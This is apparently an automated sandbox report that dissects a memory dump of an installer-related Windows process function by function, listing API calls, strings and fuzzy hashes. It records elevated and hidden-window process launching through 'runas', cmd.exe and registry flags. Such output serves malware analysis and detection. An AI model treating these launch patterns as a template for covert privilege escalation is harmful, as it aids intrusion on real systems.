                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 8baf37d041a291f986a3990f69517c5853c969abb358ce684c0b8fe845d2d49b
                                                                      • Instruction ID: bf2da7af2177b1f096a195f17616217efaa97c11f95fbf3983e03115826c5f0a
                                                                      • Opcode Fuzzy Hash: 8baf37d041a291f986a3990f69517c5853c969abb358ce684c0b8fe845d2d49b
                                                                      • Instruction Fuzzy Hash: B6F0BB316C122667EB212B26DCC9ADB37889B52771B144127A824A62D0CBA8D88189DD

                                                                      Non-executed Functions

                                                                      Function 003E7660 Relevance: 42.4, APIs: 16, Strings: 8, Instructions: 384libraryloadersleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 375 3e7660-3e76cb 376 3e76cc-3e7728 call 3e8530 call 3e2100 * 2 call 3e7db0 375->376 384 3e772e-3e773d 376->384 385 3e7a7b-3e7aac call 3e1910 GetWindowThreadProcessId 376->385 386 3e773f-3e7747 call 3e2750 384->386 387 3e774a-3e7760 call 410d39 384->387 393 3e7aae-3e7ade GetWindowLongW 385->393 394 3e7ae1-3e7ae8 385->394 386->387 387->385 396 3e7766-3e7796 call 3e2100 387->396 399 3e7798-3e779b 396->399 400 3e77a0-3e77a4 396->400 399->400 401 3e77aa-3e77af 400->401 402 3e7855-3e78a2 400->402 405 3e77b1-3e77b7 401->405 403 3e78ad-3e78af 402->403 404 3e78a4-3e78aa GetForegroundWindow 402->404 408 3e78bd-3e78cc ShellExecuteExW 403->408 409 3e78b1-3e78bb call 3e7af0 403->409 404->403 406 3e77b9-3e77bc 405->406 407 3e77d7-3e77d9 405->407 410 3e77be-3e77c6 406->410 411 3e77d3-3e77d5 406->411 412 3e77dc-3e77de 407->412 414 3e78ce-3e78d9 call 3e7c30 408->414 415 3e78dc-3e78de 408->415 409->408 410->407 416 3e77c8-3e77d1 410->416 411->412 417 3e7816-3e7852 GetWindowsDirectoryW call 3e1980 * 2 412->417 418 3e77e0-3e77e5 412->418 414->415 421 3e7912-3e7932 call 3e7ef0 415->421 422 3e78e0-3e78e6 415->422 416->405 416->411 417->402 424 3e77e7-3e77ed 418->424 436 3e79cb-3e79d0 421->436 437 3e7938-3e795e GetModuleHandleW GetProcAddress AllowSetForegroundWindow 421->437 427 3e78ed-3e7907 ShellExecuteExW 422->427 428 3e78e8-3e78eb 422->428 432 3e77ef-3e77f2 424->432 433 3e780d-3e780f 424->433 427->421 430 3e7909-3e790d call 3e7c30 427->430 428->421 428->427 430->421 438 3e7809-3e780b 432->438 439 3e77f4-3e77fc 432->439 440 3e7812-3e7814 433->440 442 3e79f2-3e7a12 call 3e7d30 436->442 443 3e79d2-3e79da 436->443 437->436 449 3e7960-3e7967 437->449 438->440 439->433 444 3e77fe-3e7807 439->444 440->402 440->417 450 3e7a1c-3e7a2d 442->450 451 3e7a14-3e7a17 442->451 443->442 445 3e79dc-3e79ec WaitForSingleObject GetExitCodeProcess 443->445 444->424 444->438 445->442 449->436 452 3e7969-3e7982 GetModuleHandleW GetProcAddress 449->452 453 3e7a2f-3e7a32 450->453 454 3e7a37-3e7a4c 450->454 451->450 455 3e79c8 452->455 456 3e7984-3e798c 452->456 453->454 457 3e7a4e-3e7a51 454->457 458 3e7a56-3e7a7a call 407708 454->458 455->436 462 3e7990-3e7993 456->462 457->458 462->455 463 3e7995-3e79bf Sleep EnumWindows 462->463 463->462 464 3e79c1-3e79c2 BringWindowToTop 463->464 464->455
                                                                      APIs
                                                                      • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 003E781F
                                                                      • GetForegroundWindow.USER32(?,?), ref: 003E78A4
                                                                      • ShellExecuteExW.SHELL32(?), ref: 003E78C1
                                                                      • ShellExecuteExW.SHELL32(?), ref: 003E78FF
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 003E7942
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003E7949
                                                                      • AllowSetForegroundWindow.USER32(00000000), ref: 003E7953
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 003E7973
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003E797A
                                                                      • Sleep.KERNEL32(00000064,?,?,?), ref: 003E7997
                                                                      • EnumWindows.USER32(003E7A90,?), ref: 003E79B3
                                                                      • BringWindowToTop.USER32(?), ref: 003E79C2
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 003E79DF
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 003E79EC
                                                                        • Part of subcall function 003E7D30: CloseHandle.KERNEL32(?,755CD0F6,00000010,00000010,?,?), ref: 003E7D72
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 003E7A9C
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 003E7AB4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Handle$AddressExecuteForegroundModuleProcProcessShellWindows$AllowBringCloseCodeDirectoryEnumExitLongObjectSingleSleepThreadWait
                                                                      • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
                                                                      • API String ID: 1023610922-986041216
                                                                      • Opcode ID: 6128159a1b4d92ff310769b615d80500b454131e153577702823a22f84e7d430
                                                                      • Instruction ID: 4108c1abb875e469d437025c4cef13bfb58f6e51871c20ebf481b82183e9e42e
                                                                      • Opcode Fuzzy Hash: 6128159a1b4d92ff310769b615d80500b454131e153577702823a22f84e7d430
                                                                      • Instruction Fuzzy Hash: AAE1C071E00259DFDB11DFA9C888BAEB7F5FF18310F258269E515EB291DB349901CBA0
                                                                      Function 003ED060 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 472COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf$FreeLocal
                                                                      • String ID: %$+
                                                                      • API String ID: 2429749586-2626897407
                                                                      • Opcode ID: 3ada492eb606007cef53eb0810d84f2afe81b2541e39e9e6a30f268aee45d874
                                                                      • Instruction ID: ea4c736b21c7f0dc49e5d5919c150a0294538b6159c165b774a1fb8658b06dfd
                                                                      • Opcode Fuzzy Hash: 3ada492eb606007cef53eb0810d84f2afe81b2541e39e9e6a30f268aee45d874
                                                                      • Instruction Fuzzy Hash: 6A02DE71E102699FDB16CFA9DC40BAEBBB5FF49300F15462AF811AB281D734A941CB91
                                                                      Function 003F0E90 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 455registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 003F12C4
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,004457C0,00000800), ref: 003F12E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: OpenQueryValue
                                                                      • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                      • API String ID: 4153817207-1914306501
                                                                      • Opcode ID: 14f0a01466cd002d8f28db3708d873f8b8938a49391d2c45257a28bb898956a1
                                                                      • Instruction ID: c05156054d0c722f61ded7e4f1bcf96f4c2326e9178f9350dad0df5dffd2b373
                                                                      • Opcode Fuzzy Hash: 14f0a01466cd002d8f28db3708d873f8b8938a49391d2c45257a28bb898956a1
                                                                      • Instruction Fuzzy Hash: 42E12629A0035ACBCB3A9F14E840376B3E1FF95740F5A846ADB45CB696E771CC82C395
                                                                      Function 003E61D0 Relevance: 10.7, APIs: 7, Instructions: 234processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003E6242
                                                                      • CloseHandle.KERNEL32(00000000), ref: 003E6285
                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003E62E1
                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 003E62FD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 003E6445
                                                                      • Process32NextW.KERNEL32(?,0000022C), ref: 003E6463
                                                                      • CloseHandle.KERNEL32(00000000), ref: 003E648E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 708755948-0
                                                                      • Opcode ID: e346f32d7d886142333a9ec0103d232aab8c7fcef291c463dac37ccdc567edf1
                                                                      • Instruction ID: f3d6ca2e0717f41039d24e68af7a443e4889901166b4fab47297791526ffd3cc
                                                                      • Opcode Fuzzy Hash: e346f32d7d886142333a9ec0103d232aab8c7fcef291c463dac37ccdc567edf1
                                                                      • Instruction Fuzzy Hash: 0AA18A70901269DBDB21DF65C849BDEBBB8EF44704F1082D9E419A72D0D7B86E84CF94
                                                                      Function 00424609 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: c7b8dc240282a7a5510ecc3e03be49f14ab8a7257404a6045dc805de84fa9c73
                                                                      • Instruction ID: 92cd29b00bd1a58eb80dad67928f0923bd740d049928f324980db03a00b21234
                                                                      • Opcode Fuzzy Hash: c7b8dc240282a7a5510ecc3e03be49f14ab8a7257404a6045dc805de84fa9c73
                                                                      • Instruction Fuzzy Hash: BDD24971E086288FDB65CE28ED407EAB7B5EB85305F5441EBD40DE7240EB78AE818F45
                                                                      Function 00423BA3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00423EC1,00000002,00000000,?,?,?,00423EC1,?,00000000), ref: 00423C3C
                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00423EC1,00000002,00000000,?,?,?,00423EC1,?,00000000), ref: 00423C65
                                                                      • GetACP.KERNEL32(?,?,00423EC1,?,00000000), ref: 00423C7A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 2299586839-711371036
                                                                      • Opcode ID: 298165ed825df0dbebc88ec0e0a98ffcfabe127ce2165f473f965049810c4140
                                                                      • Instruction ID: 9f3e923bda5a300087df26d2158064d5b8b883c7e715afc46cdac063bc26ceaa
                                                                      • Opcode Fuzzy Hash: 298165ed825df0dbebc88ec0e0a98ffcfabe127ce2165f473f965049810c4140
                                                                      • Instruction Fuzzy Hash: 2921B733700120A6EB34CF16E900A9776B6AB50F52BD58426E50AE7201E73EDF41C358
                                                                      Function 00423D78 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
                                                                        • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00423E84
                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00423ECD
                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00423EDC
                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00423F24
                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00423F43
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                      • String ID:
                                                                      • API String ID: 415426439-0
                                                                      • Opcode ID: c5f36cd20b5e213495f66198909215f8b55dfdb382b865dc1fe9aa905d4ed3d9
                                                                      • Instruction ID: 5918bea2b0c1ff1b954371ec1f3577a1673c409a817c1869aa3c958deb058858
                                                                      • Opcode Fuzzy Hash: c5f36cd20b5e213495f66198909215f8b55dfdb382b865dc1fe9aa905d4ed3d9
                                                                      • Instruction Fuzzy Hash: 3451A171B00225ABDF20DFA5EC45ABB77B8AF44706F95442AE500E7250E77CDE08CB69
                                                                      Function 00423414 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
                                                                        • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,0041994B,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004234D5
                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0041994B,?,?,?,00000055,?,-00000050,?,?), ref: 00423500
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00423663
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                      • String ID: utf8
                                                                      • API String ID: 607553120-905460609
                                                                      • Opcode ID: 055363e813afd50b0827dafecd105ad4a5e55e958c69a869a54332ac920c4360
                                                                      • Instruction ID: 7fe38f0c1d5247d2ffa1c8824f60ad0be688433b91b00623f7cf5c105c35b7f2
                                                                      • Opcode Fuzzy Hash: 055363e813afd50b0827dafecd105ad4a5e55e958c69a869a54332ac920c4360
                                                                      • Instruction Fuzzy Hash: BE710871B00321BADB25AF35EC42BA773B8AF05705F90446BF509D7281EB7CEA418659
                                                                      Function 0041B336 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _strrchr
                                                                      • String ID:
                                                                      • API String ID: 3213747228-0
                                                                      • Opcode ID: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                      • Instruction ID: ecb972cfb30e69e50b71a92e0170889ab507eb156859c0ce8d0f4975dfeaf365
                                                                      • Opcode Fuzzy Hash: f068e2ee9b525f32e3efd226be2df2fe614e6fc1a05ef0a7f01a5d797c6cceda
                                                                      • Instruction Fuzzy Hash: 28B14972A002559FDB118F68C8817EEBBA6EF59354F14816BE805AB341D3389D81CBE9
                                                                      Function 004083BD Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004083C9
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00408495
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004084B5
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 004084BF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                      • String ID:
                                                                      • API String ID: 254469556-0
                                                                      • Opcode ID: fc797f530f18eb8001a8b3bdb3904989bca17ed8397d8b1166945e9eb7661c4c
                                                                      • Instruction ID: 3959213b7dfa1d1df3849048af917da5a261bdd5227f13d02cf305012448d43e
                                                                      • Opcode Fuzzy Hash: fc797f530f18eb8001a8b3bdb3904989bca17ed8397d8b1166945e9eb7661c4c
                                                                      • Instruction Fuzzy Hash: 18313A75D013189BDB20DF64D9497CDBBB8AF04304F1041AEE44CAB290EB755A85CF48
                                                                      Function 003E2510 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00407875: EnterCriticalSection.KERNEL32(00444AF8,00000000,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 00407880
                                                                        • Part of subcall function 00407875: LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26,?,?,?,755CD0F6), ref: 004078BD
                                                                      • GetProcessHeap.KERNEL32 ref: 003E2565
                                                                        • Part of subcall function 0040782B: EnterCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407835
                                                                        • Part of subcall function 0040782B: LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407868
                                                                        • Part of subcall function 0040782B: RtlWakeAllConditionVariable.NTDLL ref: 004078DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                      • String ID: WD$ WD$<WD
                                                                      • API String ID: 325507722-3183347824
                                                                      • Opcode ID: 786eebcaec90935a2f8e8ea94c5e1d57d1814bc1e15a8b58a6cfe5f642dbbdf7
                                                                      • Instruction ID: 8b9c6f04b6d304b22481d9b3d44cbcf3bd7873a4db0f4da5ef411da612fe2a1d
                                                                      • Opcode Fuzzy Hash: 786eebcaec90935a2f8e8ea94c5e1d57d1814bc1e15a8b58a6cfe5f642dbbdf7
                                                                      • Instruction Fuzzy Hash: 71218DB5914B00DBDF10EFA5E946B497BE4E70A329F20423AE424973D2D7BC6900CB9D
                                                                      Function 003F2161 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,?,003E3270,?), ref: 003F2176
                                                                      • FormatMessageA.KERNEL32(00001300,00000000,755CD0F6,00000000,00000000,00000000,00000000,?,?,?,003E3270,?), ref: 003F2198
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FormatInfoLocaleMessage
                                                                      • String ID: !x-sys-default-locale
                                                                      • API String ID: 4235545615-2729719199
                                                                      • Opcode ID: e6cc7986e0bb00fa3d9c3ba77cbaa4c3ad632cccce897050021d6caa5a8b4a13
                                                                      • Instruction ID: 1f88d669c403837d645275687780190e6c66886cfe2bd2d269c572aed6078ca4
                                                                      • Opcode Fuzzy Hash: e6cc7986e0bb00fa3d9c3ba77cbaa4c3ad632cccce897050021d6caa5a8b4a13
                                                                      • Instruction Fuzzy Hash: D6E06DB6650118FFFB149FA0CC0BEBF7B6DEB04790F104125BA02D6180E2B06E00CBA4
                                                                      Function 00423827 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
                                                                        • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042387B
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004238C5
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042398B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 661929714-0
